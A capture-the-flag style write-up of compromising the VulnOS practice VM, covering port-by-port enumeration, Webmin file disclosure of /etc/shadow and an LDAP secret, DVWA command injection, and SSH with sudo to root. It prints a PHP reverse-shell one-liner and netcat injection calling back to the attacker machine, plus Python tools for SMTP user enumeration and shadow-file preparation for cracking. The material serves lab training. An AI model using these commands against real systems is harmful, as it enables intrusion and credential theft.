boot2root: VulnOS

A little bit dated now, but I hadn't actually run through this one so I thought I'd document it as I did!

As usual, starting with a:
netdiscover -i eth0

We discover that the machine is running on 192.168.56.103.

Next we run a full-port nmap scan with service and OS detection. The name "VulnOS" is certainly not a lie!
root@kali:~# nmap -sS -T4 -A 192.168.56.103 -p 1-65535

Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-24 18:41 GMT
Nmap scan report for 192.168.56.103
Host is up (0.00017s latency).
Not shown: 65507 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_  2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:33+00:00; -2s from scanner time.
53/tcp    open  domain      ISC BIND 9.7.0-P1
| dns-nsid: 
|_  bind.version: 9.7.0-P1
80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP STLS SASL CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:35+00:00; -2s from scanner time.
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: QRESYNC ESEARCH THREAD=REFS CONTEXT=SEARCH Capability THREAD=REFERENCES OK MULTIAPPEND SORT ESORT UNSELECT SORT=DISPLAY ID SEARCHRES IDLE STARTTLS completed WITHIN LOGINDISABLEDA0001 CONDSTORE ENABLE I18NLEVEL=1 UIDPLUS LITERAL+ LIST-EXTENDED SASL-IR NAMESPACE CHILDREN IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:34+00:00; -2s from scanner time.
389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
901/tcp   open  http        Samba SWAT administration server
| http-auth: 
| HTTP/1.0 401 Authorization Required
|_  Basic realm=SWAT
|_http-title: 401 Authorization Required
993/tcp   open  ssl/imap    Dovecot imapd
|_imap-capabilities: QRESYNC ESEARCH THREAD=REFS CONTEXT=SEARCH Capability THREAD=REFERENCES OK MULTIAPPEND SORT ESORT UNSELECT SORT=DISPLAY ID AUTH=LOGINA0001 IDLE AUTH=PLAIN completed WITHIN SEARCHRES CONDSTORE ENABLE I18NLEVEL=1 UIDPLUS LITERAL+ LIST-EXTENDED SASL-IR NAMESPACE CHILDREN IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:34+00:00; -2s from scanner time.
| sslv2: 
|   SSLv2 supported
|_  ciphers: none
995/tcp   open  ssl/pop3    Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN LOGIN) USER CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:35+00:00; -2s from scanner time.
| sslv2: 
|   SSLv2 supported
|_  ciphers: none
2000/tcp  open  sieve       Dovecot timsieved
2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status
3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info: 
|   Protocol: 53
|   Version: .1.73-0ubuntu0.10.04.1
|   Thread ID: 311
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, LongPassword, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsTransactions, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, FoundRows
|   Status: Autocommit
|_  Salt: 2*}W}0ssh/N}LBDm{CxW
3632/tcp  open  tcpwrapped
6667/tcp  open  irc         IRCnet ircd
| irc-info: 
|   users: 1
|   servers: 1
|   chans: 15
|   lusers: 1
|   lservers: 0
|   server: irc.localhost
|   version: 2.11.2p1. irc.localhost 000A 
|   uptime: 0 days, 0:02:04
|   source ident: NONE or BLOCKED
|   source host: 192.168.56.102
|_  error: Closing Link: yjlqbpihq[~nmap@192.168.56.102] ("")
8070/tcp  open  unknown
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-server-header: MiniServ/0.01
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
33701/tcp open  nlockmgr    1-4 (RPC #100021)
42277/tcp open  mountd      1-3 (RPC #100005)
59538/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:43:06:19 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 1 hop
Service Info: Hosts:  VulnOS.home, irc.localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: VULNOS, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.01 seconds

The award for the longest nmap output I've ever seen for a boot2root challenge is certainly going to go to this one.
It's hard not to be a little overwhelmed by this output, but if we start at the top and do a quick Google on the versions involved we should get somewhere.
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 43:a6:84:8d:be:1a:ee:fb:ed:c3:23:53:14:14:8f:50 (DSA)
|_  2048 30:1d:2d:c4:9e:66:d8:bd:70:7c:48:84:fb:b9:7b:09 (RSA)

From a cursory Google this doesn't seem vulnerable.

23/tcp    open  telnet      Linux telnetd

This is potentially vulnerable to the telnetd encrypt_keyid buffer overflow (CVE-2011-4862). Whether it really is depends on which telnetd sits behind the generic "Linux telnetd" banner, so it needs confirming before we lean on it.
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: VulnOS.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:33+00:00; -2s from scanner time.

There's a good chance this is vulnerable to Shellshock over SMTP, and a lesser chance it may be vulnerable to the GLD greylisting buffer overflow. One caveat on the first: Postfix itself never passes message headers through bash, so that route only exists if mail ends up in a piped alias, procmail or similar; worth a try rather than a sure thing. Note also that VRFY is enabled, which hands us a cheap way to enumerate local accounts without any credentials.
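Since the smtp-commands line above shows VRFY enabled, the following is an added example (not part of the original post) of using it to enumerate accounts. It carries a constructed stand-in SMTP server so it runs offline; the user names and replies in it are made up, and the stand-in mirrors Postfix's habit of answering 252 rather than 250 for addresses it would accept and 550 for unknown local users.

```python
"""SMTP VRFY user enumeration, with an in-process stand-in server for testing."""
import socket
import threading


def _recv_line(sock):
    """Read one CRLF-terminated line from the socket (empty string on EOF)."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode(errors="replace").rstrip("\r\n")


def read_reply(sock):
    """Consume one complete SMTP reply (single- or multi-line) and return its code."""
    while True:
        line = _recv_line(sock)
        if not line:
            return 0
        code = int(line[:3]) if line[:3].isdigit() else 0
        if len(line) < 4 or line[3] != "-":   # "250-..." continues, "250 ..." ends
            return code


def classify(code):
    """Map a VRFY reply code to a verdict.

    250: address confirmed. 252: server will not fully verify but would accept
    mail for it (Postfix answers this for known local users). 550: unknown user.
    """
    return {250: "valid", 252: "accepted", 550: "invalid"}.get(code, "error")


def vrfy_users(host, port, candidates, timeout=5.0):
    """Issue one VRFY per candidate over a single session; return {user: verdict}."""
    results = {}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        read_reply(sock)                        # 220 banner
        sock.sendall(b"EHLO enum.example\r\n")
        read_reply(sock)                        # capability list
        for user in candidates:
            sock.sendall(f"VRFY {user}\r\n".encode())
            results[user] = classify(read_reply(sock))
        sock.sendall(b"QUIT\r\n")
        read_reply(sock)                        # 221, then close cleanly
    return results


def start_fake_smtp(valid_users):
    """Constructed stand-in for Postfix's VRFY behaviour; returns the bound port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn, conn.makefile("rb") as lines:
            conn.sendall(b"220 VulnOS.home ESMTP Postfix\r\n")
            for raw in lines:
                verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
                verb = verb.upper()
                if verb == "EHLO":
                    conn.sendall(b"250-VulnOS.home\r\n250 VRFY\r\n")
                elif verb == "VRFY":
                    if arg in valid_users:
                        conn.sendall(f"252 2.0.0 {arg}\r\n".encode())
                    else:
                        conn.sendall(b"550 5.1.1 User unknown in local recipient table\r\n")
                elif verb == "QUIT":
                    conn.sendall(b"221 2.0.0 Bye\r\n")
                    break
                else:
                    conn.sendall(b"502 5.5.2 Error: command not recognized\r\n")

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    # Constructed demo: these "valid" users exist only in the stand-in server.
    port = start_fake_smtp({"root", "vulnosadmin"})
    print(vrfy_users("127.0.0.1", port, ["root", "vulnosadmin", "mulder", "scully"]))
```

Against a real target, swap the stand-in for the host and port from the scan and feed it a user wordlist; keep it to one session, since a VRFY per connection is noisy and slow.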

53/tcp    open  domain      ISC BIND 9.7.0-P1
| dns-nsid: 
|_  bind.version: 9.7.0-P1

There doesn't seem to be much in the way of useful exploits available for this, just a few DoS exploits.

80/tcp    open  http        Apache httpd 2.2.14 ((Ubuntu))
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: index

Let's fire nikto at this to see if we can get a bit more detail.
nikto -host 192.168.56.103

Nothing from the output immediately catches the eye other than that phpMyAdmin appears to be accessible at its default path.
Let's have a look at the website to see if there's any info we can glean.

Sensible advice, but nothing to exploit on this page.
The next page is marginally more interesting:

Somebody likes the X-Files, probably worth bearing in mind.
Nothing particularly interesting in the source code other than the existence of an "imgs" directory, but the only thing in there is the X image shown at the bottom of the page.
Time to point dirbuster at the site and make a sandwich whilst it runs.
phpMyAdmin, phpPgAdmin, phpGroupWare, eGroupware and phpSysInfo were found as directories on the web server.
There are no immediately obvious exploits for these, but phpSysInfo publishes details of the host (OS, kernel, hardware, mounts) that we may find useful later:

Continuing down the list:
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP STLS SASL CAPA UIDL PIPELINING RESP-CODES
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:35+00:00; -2s from scanner time.

Initial testing shows this not to be vulnerable to the Metasploit exim4_dovecot_exec module. That module actually targets Exim configured to deliver through Dovecot's LDA, and the MTA here is Postfix, so it's unlikely to get anywhere however the settings are tuned; the Dovecot service itself is still worth coming back to if we get stuck elsewhere.
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status

Nothing unusual here.

139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

Samba 3.4.7 (the Ubuntu 10.04 package) is likely to be pretty secure, but may be affected by the critical CVE-2012-1182 RPC heap overflow, which Metasploit's setinfopolicy_heap module targets.
Sadly, this server has been patched:
msf exploit(setinfopolicy_heap) > exploit

[*] Started reverse handler on 192.168.56.102:4444 
[*] Trying to exploit Samba with address 0xb67f1000...
[*] Trying to exploit Samba with address 0xb67f2000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f3000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f4000...
[*] Trying to exploit Samba with address 0xb67f5000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f6000...
[-] Server is most likely patched...
[*] Trying to exploit Samba with address 0xb67f7000...
[-] Server is most likely patched...

Moving on!

143/tcp   open  imap        Dovecot imapd
|_imap-capabilities: QRESYNC ESEARCH THREAD=REFS CONTEXT=SEARCH Capability THREAD=REFERENCES OK MULTIAPPEND SORT ESORT UNSELECT SORT=DISPLAY ID SEARCHRES IDLE STARTTLS completed WITHIN LOGINDISABLEDA0001 CONDSTORE ENABLE I18NLEVEL=1 UIDPLUS LITERAL+ LIST-EXTENDED SASL-IR NAMESPACE CHILDREN IMAP4rev1 LOGIN-REFERRALS
| ssl-cert: Subject: commonName=VulnOS.home
| Not valid before: 2014-03-09T14:00:56
|_Not valid after:  2024-03-06T14:00:56
|_ssl-date: 2015-11-24T18:41:34+00:00; -2s from scanner time.

This is the Dovecot server again. Possibly worth further investigation but I'll skip over it on this pass.

389/tcp   open  ldap        OpenLDAP 2.2.X - 2.3.X

Unfortunately there only seem to be DoS vulnerabilities for this version, which isn't what we're after. Still, a host that authenticates against LDAP normally keeps a bind password for it somewhere on disk, so it's worth remembering if we get arbitrary file read later.

445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

Samba again, same as before.

512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd

512 to 514 are the Berkeley r-services (rexec, rlogin, rsh). rsh only lets us in without a password if our host and user appear in /etc/hosts.equiv or a target user's ~/.rhosts, and rlogin otherwise prompts for a password, so there's nothing here until we have credentials.

901/tcp   open  http        Samba SWAT administration server
| http-auth: 
| HTTP/1.0 401 Authorization Required
|_  Basic realm=SWAT
|_http-title: 401 Authorization Required

Running a web server but it requires basic auth. SWAT authenticates against the system's own accounts: a normal user can only view the configuration, and the root password is needed to change anything, so it's a dead end without credentials.

2000/tcp  open  sieve       Dovecot timsieved

Dovecot again.

2049/tcp  open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41687/udp  mountd
|   100005  1,2,3      42277/tcp  mountd
|   100021  1,3,4      33701/tcp  nlockmgr
|   100021  1,3,4      46240/udp  nlockmgr
|   100024  1          42901/udp  status
|_  100024  1          59538/tcp  status

This has the potential to be interesting. There's a post on exploiting NFS here.
Unfortunately, no shares are exposed:
root@kali:~/vulnos# showmount -e 192.168.56.103
Export list for 192.168.56.103:


3306/tcp  open  mysql       MySQL 5.1.73-0ubuntu0.10.04.1
| mysql-info: 
|   Protocol: 53
|   Version: .1.73-0ubuntu0.10.04.1
|   Thread ID: 311
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, LongPassword, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsTransactions, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, FoundRows
|   Status: Autocommit
|_  Salt: 2*}W}0ssh/N}LBDm{CxW

Unfortunately 5.1.73 is a late release that patched a lot of the major issues.
There's potentially still an attack vector here (the service is reachable from the network, so weak credentials or reuse of a password turned up elsewhere would do), but as this is a quick first pass let's move on.

3632/tcp  open  tcpwrapped

nmap reports a port as tcpwrapped when the TCP handshake completes but the remote host closes the connection before any data is sent or received. That's the signature of a daemon behind TCP Wrappers (hosts.allow/hosts.deny) or a similar source-address check that rejects us: the port is open, it just won't talk to us. 3632/tcp is the registered distcc port, which is worth bearing in mind if the wrapper ever lets us through.
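To make the tcpwrapped distinction concrete, here is an added example (mine, not from the original post) that classifies a port by what happens in the first moments after connect. The two local listeners it starts are constructed stand-ins: one accepts and immediately closes, the way a wrapped daemon rejecting our address behaves, and one greets the client with a made-up Postfix-style banner.

```python
"""Tell an nmap-style "tcpwrapped" port from a real service by watching what
happens right after the TCP handshake."""
import socket
import threading


def probe(host, port, timeout=3.0):
    """Connect and wait for the first bytes.

    Returns one of:
      "closed"      - RST on connect (nothing listening)
      "filtered"    - no answer at all within the timeout
      "tcpwrapped"  - handshake completed, peer closed without sending a byte
      "open-silent" - connection stays up but the service waits for us to talk
      "banner:<..>" - service greeted us (first line of what it sent)
    """
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except ConnectionRefusedError:
        return "closed"
    except OSError:                       # includes the connect timeout
        return "filtered"
    with sock:
        try:
            data = sock.recv(1024)
        except socket.timeout:
            return "open-silent"
        except ConnectionResetError:      # RST instead of FIN: same verdict
            return "tcpwrapped"
    if not data:
        return "tcpwrapped"
    first = (data.decode(errors="replace").splitlines() or [""])[0]
    return "banner:" + first


def _listen(handler):
    """Start a throwaway local listener that hands each connection to handler."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:                    # closed as soon as handler returns
                handler(conn)

    threading.Thread(target=serve, daemon=True).start()
    return port


def start_wrapped_listener():
    """Mimics a daemon behind TCP Wrappers refusing our address: accept, then close."""
    return _listen(lambda conn: None)


def start_banner_listener(banner=b"220 VulnOS.home ESMTP Postfix\r\n"):
    """Mimics a service that greets the client (constructed banner)."""
    return _listen(lambda conn: conn.sendall(banner))


if __name__ == "__main__":
    for name, port in (("wrapped", start_wrapped_listener()),
                       ("banner", start_banner_listener())):
        print(name, "->", probe("127.0.0.1", port))
```

Run it against a live target instead of the stand-ins and a tcpwrapped verdict tells you to look for a source-address restriction rather than a dead port.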

6667/tcp  open  irc         IRCnet ircd
| irc-info: 
|   users: 1
|   servers: 1
|   chans: 15
|   lusers: 1
|   lservers: 0
|   server: irc.localhost
|   version: 2.11.2p1. irc.localhost 000A 
|   uptime: 0 days, 0:02:04
|   source ident: NONE or BLOCKED
|   source host: 192.168.56.102
|_  error: Closing Link: yjlqbpihq[~nmap@192.168.56.102] ("")

Doesn't appear to be vulnerable. Not sure why there's an IRC server running though!

8070/tcp  open  unknown

Not sure what this is, and connecting with netcat doesn't give any more information.

8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

Apache Tomcat instance. Requires login for the manager pages. Don't read too much into the "risky methods" line: nmap is just echoing the OPTIONS reply, and whether PUT actually writes anything depends on the DefaultServlet's readonly setting. If we can get hold of /conf/tomcat-users.xml later, the manager credentials in it may be useful.

10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-server-header: MiniServ/0.01
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

Aha, Webmin. Metasploit's auxiliary/admin/webmin/file_disclosure module (CVE-2006-3392) reads arbitrary files from old Webmin versions without authentication.
Running this we're able to pull /etc/passwd and /etc/shadow. Unfortunately, attempting to crack them hasn't really worked out for me.
Taking another look at the web server, I pointed DIRB at it and found /drupal6. The page returned lists other installed apps, including "Damn Vulnerable Web Application".


Trying the default credentials (admin/password) for this, we are able to log in.
We can then lower the DVWA security level to "Low" and use the Command Execution section, which appends our input to a ping command run through a shell.
Attempting to connect back to a listener on our box (nc -lvvp 4444) with ";netcat 192.168.56.102 4444" works, but adding -e does not, which suggests the installed netcat is a build without the -e option (on Ubuntu the default is netcat-openbsd, which has no -e).
There are a few different ways around this, but the most popular is to use
; php -r '$sock=fsockopen("192.168.56.102",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
in order to launch the shell from PHP instead. The <&3 trick relies on the socket being the next free descriptor (fd 3) after stdin, stdout and stderr in the php process, which holds for a fresh php -r.

And we've got a limited shell!
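DVWA is PHP, but the bug we just used is worth seeing next to its fix. The following is an added example of my own (not DVWA's code) that models the low-security ping handler in Python: one function glues the target into a shell command line, the other validates it as an IP address and runs ping without a shell. The injected "; echo INJECTED" input is constructed for the demo.

```python
"""The DVWA "Command Execution" bug modelled in Python: the vulnerable handler
beside a hardened one."""
import ipaddress
import subprocess


def vulnerable_ping(target):
    """Low-security DVWA style: user input glued into a shell command line.

    `;`, `|`, `&&`, backticks and `$(...)` in `target` are interpreted by
    /bin/sh, so anything after a `;` runs as its own command.
    """
    cmd = "ping -c 1 " + target
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def safe_ping(target):
    """Hardened form: validate as an IP address and never go through a shell.

    ipaddress.ip_address raises ValueError on anything that isn't a literal
    IPv4/IPv6 address, and the list form of subprocess.run passes `host` to
    ping as one argument, so metacharacters can't split the command.
    """
    host = str(ipaddress.ip_address(target))
    result = subprocess.run(["ping", "-c", "1", host], capture_output=True, text=True)
    return result.stdout


def contains_injection(target):
    """Cheap detector for shell metacharacters a WAF rule or log review could flag."""
    return any(ch in target for ch in ";|&`$<>\n")


def safe_ping_rejects(target):
    """True if the hardened handler refuses the input (used to show the contrast)."""
    try:
        safe_ping(target)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("vulnerable output:", vulnerable_ping(payload).strip())
    print("hardened rejects payload:", safe_ping_rejects(payload))
```

Even with ping missing or unable to send ICMP, the injected echo still runs in the vulnerable version, which is exactly why the DVWA page gave us a shell; the hardened version fails closed before any process starts.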
After an embarrassing length of time trying to get a local privilege escalation exploit that works, I remembered the server had OpenLDAP running. A host whose accounts come from LDAP (via libnss-ldap/pam_ldap) keeps the bind password for the rootbinddn named in /etc/ldap.conf in /etc/ldap.secret, a root-only file. Using the Webmin file disclosure exploit we read that file and get the password "canuhackme".
Testing this against the unshadowed file from earlier, we get a match for the user "vulnosadmin"!
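For the "unshadowed file" step, here is an added example (mine, not the original post's) that merges passwd and shadow the way John's unshadow does, drops locked and passwordless accounts so the cracker isn't wasting time on them, and names the crypt scheme so you know which --format to give John. The sample passwd and shadow lines are constructed in the Ubuntu 10.04 layout with made-up hashes, not VulnOS's real files.

```python
"""Merge /etc/passwd and /etc/shadow the way John's `unshadow` does, keeping only
accounts whose hash is actually crackable."""

# Constructed sample lines in the Ubuntu 10.04 layout (fake hashes, not VulnOS's).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vulnosadmin:x:1000:1000:vulnosadmin,,,:/home/vulnosadmin:/bin/bash
"""

SHADOW_SAMPLE = """\
root:$6$saltsalt$fakehashfakehashfakehashfakehashfakehashfakehashfakehash:16138:0:99999:7:::
daemon:*:15937:0:99999:7:::
sshd:*:15937:0:99999:7:::
vulnosadmin:$6$othersalt$anotherfakehashanotherfakehashanotherfakehashanotherfake:16138:0:99999:7:::
"""


def parse_colon_file(text):
    """Return {username: fields} for a passwd- or shadow-style file."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def is_crackable(hash_field):
    """True if the field holds a real hash rather than a lock marker or 'x'."""
    if hash_field in ("", "x"):
        return False
    return not hash_field.startswith(("!", "*"))


def hash_algorithm(hash_field):
    """Name the crypt(3) scheme from the prefix, to pick John's --format."""
    prefixes = {"$1$": "md5crypt", "$5$": "sha256crypt",
                "$6$": "sha512crypt", "$y$": "yescrypt"}
    for prefix, name in prefixes.items():
        if hash_field.startswith(prefix):
            return name
    return "descrypt" if len(hash_field) == 13 else "unknown"


def unshadow(passwd_text, shadow_text, only_crackable=True, only_shells=False):
    """Produce John-style lines: the passwd entry with 'x' replaced by the real hash."""
    shadow = parse_colon_file(shadow_text)
    out = []
    for user, fields in parse_colon_file(passwd_text).items():
        hash_field = shadow[user][1] if user in shadow else fields[1]
        if only_crackable and not is_crackable(hash_field):
            continue
        if only_shells and fields[-1].endswith(("nologin", "false")):
            continue
        out.append(":".join([user, hash_field] + fields[2:]))
    return out


if __name__ == "__main__":
    for line in unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(hash_algorithm(line.split(":")[1]), line)
```

Write the returned lines to a file and hand it to John with the format the prefix indicates (sha512crypt here); the crackable filter is what keeps daemon accounts with "*" out of the run.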

Connecting via SSH, we discover the user can sudo and switch to the root account.
root@kali:~/vulnos# ssh vulnosadmin@192.168.56.103
vulnosadmin@192.168.56.103's password: 
Linux VulnOS 2.6.32-57-generic-pae #119-Ubuntu SMP Wed Feb 19 01:20:04 UTC 2014 i686 GNU/Linux
Ubuntu 10.04.4 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov 29 00:13:01 CET 2015

  System load:  0.04               Processes:           136
  Usage of /:   26.6% of 23.06GB   Users logged in:     0
  Memory usage: 50%                IP address for eth0: 192.168.56.103
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release 'precise' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Wed Mar 19 17:31:44 2014 from 192.168.1.3
vulnosadmin@VulnOS:~$ id
uid=1000(vulnosadmin) gid=1000(vulnosadmin) groepen=4(adm),20(dialout),24(cdrom),46(plugdev),109(lpadmin),110(sambashare),111(admin),1000(vulnosadmin)
vulnosadmin@VulnOS:~$ sudo su
[sudo] password for vulnosadmin: 
root@VulnOS:/home/vulnosadmin# id
uid=0(root) gid=0(root) groepen=0(root)

And we cat the flag
root@VulnOS:/home/vulnosadmin# ls
Maildir  vuln
root@VulnOS:/home/vulnosadmin# cd /root
root@VulnOS:~# ls
hello.txt
root@VulnOS:~# cat hello.txt
Hello,

So you got root... You still need to find the rest of the vulnerabilities inside the OS !

TRY HARDER !!!!!!!

Success!
I normally don't include the entire process (and I've probably missed a whole load of exploits given that I found the limited shell on my "initial" pass, so wasn't aiming too deep), but this should at least show the methodology involved in not getting stuck up on one area for too long.
Thanks to c4b3rw0lf for creating the VM.
